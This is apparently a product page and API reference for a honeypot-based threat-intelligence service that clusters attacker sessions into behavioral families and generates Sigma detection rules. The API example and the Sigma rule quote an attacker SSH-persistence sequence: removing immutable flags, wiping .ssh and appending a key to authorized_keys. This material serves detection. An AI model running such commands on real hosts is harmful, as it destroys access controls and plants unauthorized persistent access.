NullRoute Behavioral Genome

Live Attacker DNA.
Not IOCs. Behavior.

IOCs rotate in minutes. Behavior persists for months.

The NullRoute Behavioral Genome is a continuously updated, machine-readable catalog of real post-compromise attacker behavior - captured across a live multi-node honeypot network, classified by what attackers do, not who they are.

Sessions Analyzed

Families

Behavioral Genes

Nodes · 4 Countries

Last Updated

Architecture

Behavioral classification, from first principles

Most threat intelligence answers: who attacked you? We answer: what did they do? The Behavioral Genome decomposes each attacker session into atomic behavioral units - genes - and clusters them into families with shared evolutionary lineage.

🧬

Behavioral Atoms

Each command maps to a normalized behavioral atom - disable_immutable_ssh, download_remote, kill_process. Vocabulary of 50+ atoms across 4 protocol surfaces.

🔬

Gene Detection

Atom sequences are matched against 13 functional gene patterns. A gene is a behavioral module with a purpose - ssh_persistence, competitor_cleanup, payload_deploy.

🌿

Family Classification

Sessions with Jaccard similarity >0.6 over gene sets are grouped into families. Taxonomic hierarchy: Kingdom → Phylum → Family → Variant.

⚡

Auto-Generated Detection

Every family produces a valid Sigma rule, auto-generated from its canonical variant's behavioral atom sequence. Ready for sigma-cli conversion to Splunk, Elastic, Sentinel, and 30+ other targets.

Known Families

Classified attacker families

Active families observed across the honeypot network. indicates a family whose behavioral signature is currently evolving.

Family	Phylum	Sessions	Nodes	Last Seen
Loading...

Temporal Evolution

Behavioral genome drift

Each dot is a distinct behavioral variant. Size reflects session volume. Glowing = active in last 30 days. Pulsing = emerged in last 7 days.

Live Demo

Match commands against the genome

Submit shell commands observed in a suspicious session (one per line). The genome returns the best-matching attacker family with confidence score, matched behavioral atoms, and MITRE ATT&CK techniques.

Commands (one per line)

Do not submit real credentials, SSH keys, or sensitive data. Use obfuscated examples only.

Full BLAST Explorer Behavioral Phylogeny Timing Fingerprints

Public API

Machine-readable. No key required.

All Genome API endpoints are public and free for research use. Base URL: https://nullroute.live/api/v1/genome

GET /api/v1/genome/stats Global genome statistics

Returns overall coverage: session count, family count, gene count, node distribution, last analysis timestamp.

// GET /api/v1/genome/stats
{
  "total_sessions_analyzed": 4940,
  "family_count": 8,
  "gene_count": 13,
  "phylum_distribution": { "worm": 2, "botnet": 1, ... },
  "last_analysis": "2026-04-03T08:50:10Z"
}

GET /api/v1/genome/families List all known families · ?phylum=worm · ?node=node3-fr

Returns all classified attacker families. Filterable by phylum (worm, botnet, miner, stealer, scanner, operator) or by node.

// GET /api/v1/genome/families?phylum=worm
{
  "families": [{
    "family_id": "130df9da",
    "name": "dota_mdrfckr",
    "phylum": "worm",
    "total_sessions": 1969,
    "nodes_observed": ["node1-de", "node2-us", "node3-fr", "node4-sg"]
  }, ...]
}

GET /api/v1/genome/families/{id} Full family detail - variants, genes, MITRE mapping

Complete family profile including all variants, gene membership with ATT&CK technique mapping, and link to auto-generated Sigma rule.

// GET /api/v1/genome/families/130df9da
{
  "name": "dota_mdrfckr",
  "genes": [{
    "gene_id": "ssh_persistence",
    "attack_mappings": [{
      "technique_id": "T1098.004",
      "tactic": "persistence"
    }]
  }, ...],
  "sigma_url": "/api/v1/genome/sigma/130df9da"
}

GET /api/v1/genome/families/{id}/timeline Temporal variant emergence - evolution score, is_active, is_emerging

Returns the emergence timeline for all variants of a family, sorted by first observation. Shows evolution_score (0–1), active vs. total variant count, days since last activity, and per-variant is_active / is_emerging flags.

// GET /api/v1/genome/families/130df9da/timeline
{
  "name": "dota_mdrfckr",
  "total_variants": 35,
  "active_variants": 35,
  "emerging_variants": 35,
  "evolution_score": 1.0,
  "is_active": true,
  "days_since_last_activity": 2,
  "timeline": [
    { "variant_id": "130df9da...", "first_seen": "2026-03-14",
      "session_count": 1060, "kill_chain_max": "persist",
      "is_active": true, "is_emerging": true }
  ]
}

POST /api/v1/genome/match Match command sequence to known families

Submit a list of shell commands. Returns ranked family matches with confidence scores, matched behavioral atoms, novel atoms not in any known family, and MITRE techniques.

// POST /api/v1/genome/match
{
  "commands": [
    "chattr -ia .ssh",
    "rm -rf .ssh && mkdir .ssh",
    "echo 'ssh-rsa ...' >> .ssh/authorized_keys"
  ],
  "top_k": 3
}

// Response
{
  "matches": [{
    "name": "dota_mdrfckr",
    "confidence": 0.857,
    "matched_atoms": ["disable_immutable_ssh", "destroy_ssh_dir", ...],
    "mitre_techniques": [{ "id": "T1098.004", ... }]
  }]
}

GET /api/v1/genome/sigma/{id} Auto-generated Sigma detection rule (YAML)

Returns valid Sigma YAML for the specified family, auto-generated from its canonical variant's behavioral atom sequence. Ready for sigma-cli conversion to Splunk, Elastic, Sentinel, QRadar.

# GET /api/v1/genome/sigma/130df9da
title: 'dota_mdrfckr - NullRoute Behavioral Genome (NBG-130df9da)'
status: experimental
logsource:
  category: process_creation
  product: linux
detection:
  sel_disable_immutable_s:
    CommandLine|contains:
      - 'chattr -ia .ssh'
  condition: ...

Live Attacker DNA.Not IOCs. Behavior.